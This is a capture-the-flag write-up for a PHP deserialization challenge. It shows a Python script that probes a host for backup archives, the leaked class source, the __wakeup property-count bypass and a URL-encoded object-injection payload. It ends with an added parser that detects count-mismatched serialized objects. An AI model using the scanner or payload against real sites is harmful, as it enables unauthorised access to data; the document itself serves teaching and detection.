Hints
- Backup file download (write a small script, try names by hand, or scan with a tool)
- PHP code audit
- PHP deserialization
- PHP magic methods
The hint says there is a website backup file.
You could scan for it with a tool, but since that takes a while anyway, a simple Python script is more convenient:
```python
import requests as rt

# Common backup file names and extensions to try.
webname = {'web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp', 'db', 'data',
           'code', 'test', 'admin', 'user', 'sql'}
weblist = {'.rar', '.zip', '.7z', '.tar.gz', '.bak', '.txt', '.old', '.temp',
           '_index.html', '.swp', '.sql', '.tgz', '.tar'}

for i in webname:
    for k in weblist:
        url = f'http://d9b53d59-0a31-41a0-b879-7c8e70be3989.node4.buuoj.cn:81/{i}{k}'
        resp = rt.get(url)
        if resp.status_code == 200:
            print(i, k)
            print(resp.status_code)
            break  # found a file for this name, move on to the next name
```
So there is a www.zip file.
Visit the URL and download it.
It contains flag.php (this one is fake),
index.php,
which calls unserialize, so this challenge is about deserialization,
and class.php:
```php
<?php
include 'flag.php';
error_reporting(0);
class Name{
    private $username = 'nonono';
    private $password = 'yesyes';
    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
    function __wakeup(){
        $this->username = 'guest';
    }
    // __wakeup is a magic method that unserialize() calls when it rebuilds the object;
    // it resets username to 'guest' before anything else gets to use the object.
    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username; echo "</br>";
            echo "You password is: ";
            echo $this->password; echo "</br>";
            die();
        }
        // __destruct is also a magic method, run when the object is destroyed (after unserialize()
        // has finished): password must equal 100 and username must be exactly 'admin' to print the flag.
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();
        }
    }
}
?>
```
So we need to bypass __wakeup and set both password and username ourselves.
__wakeup is not executed when the declared number of properties does not match the number actually present (this behaviour is what the bypass relies on; it applies to the older PHP versions where it was not yet fixed).
For example:
O:4:"TEST":3:{s:5:"test1";s:2:"11";s:11:" TEST test2";s:2:"22";s:8:" * test3";s:2:"33";}
is changed to
O:4:"TEST":4:{s:5:"test1";s:2:"11";s:11:" TEST test2";s:2:"22";s:8:" * test3";s:2:"33";}
O stands for object, the 4 after it is the length of the class name, and the class name follows in double quotes.
Next comes the number of properties in the object: {type:length:"name";type:length:"value"; ... and so on}
Construct the payload:
```php
<?php
class Name{
    private $username = 'admin';
    private $password = '100';
}
echo serialize(new Name());
?>
```
which gives
O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}
We need to bypass __wakeup, so change the property count:
O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}
Private property names are serialized with null bytes around the class name (that is why "Nameusername" has length 14); those bytes render as boxes, so URL-encode the payload before submitting it.
Final payload: O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D
Submit it and get the flag.
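From the defender's side, the trick above leaves a clear signature: the property count in the O:... header does not match the members that follow. The parser below, added here as an example and not part of the original writeup, decodes a subset of PHP's serialize() format and reports every object with such a mismatch; the sample input is the writeup's final URL-encoded payload.

```python
from urllib.parse import unquote

# Constructed input: the writeup's final payload, declaring 3 properties but carrying 2.
PAYLOAD = ("O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin"
           "%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D")

def parse(s, i=0):
    """Recursive-descent parser for N, b, i, d, s, a and O tokens; returns (value, next index)."""
    t = s[i]
    if t == 'N':                                   # N;
        return None, i + 2
    if t in 'bid':                                 # b:1;  i:42;  d:1.5;
        j = s.index(';', i)
        return (float(s[i + 2:j]) if t == 'd' else int(s[i + 2:j])), j + 1
    if t == 's':                                   # s:<len>:"<bytes>";  length-prefixed, no escaping
        j = s.index(':', i + 2)
        n, start = int(s[i + 2:j]), j + 2
        return s[start:start + n], start + n + 2
    if t in 'aO':                                  # a:<count>:{...}  O:<len>:"<class>":<count>:{...}
        j = s.index(':', i + 2)
        cls, k = None, i + 2
        if t == 'O':
            n = int(s[i + 2:j])
            cls, k = s[j + 2:j + 2 + n], j + 4 + n
            j = s.index(':', k)
        declared, p, members = int(s[k:j]), j + 2, []
        while s[p] != '}':                         # key;value pairs until the closing brace
            key, p = parse(s, p)
            val, p = parse(s, p)
            members.append((key, val))
        return (('object', cls, declared, members) if t == 'O' else dict(members)), p + 1
    raise ValueError(f"unsupported token {t!r} at offset {i}")

def count_mismatches(value):
    """List (class, declared, actual) for every object, nested ones included, whose counts differ."""
    found, children = [], []
    if isinstance(value, tuple):
        _, cls, declared, members = value
        if declared != len(members):
            found.append((cls, declared, len(members)))
        children = [v for _, v in members]
    elif isinstance(value, dict):
        children = list(value.values())
    for c in children:
        found.extend(count_mismatches(c))
    return found

def check_payload(encoded):
    """URL-decode a submitted parameter value, parse it and return the mismatches found."""
    return count_mismatches(parse(unquote(encoded))[0])
```

A mismatch is not proof of an attack, but a serialized object that PHP's own serialize() would never emit is worth logging and rejecting before unserialize() ever sees it.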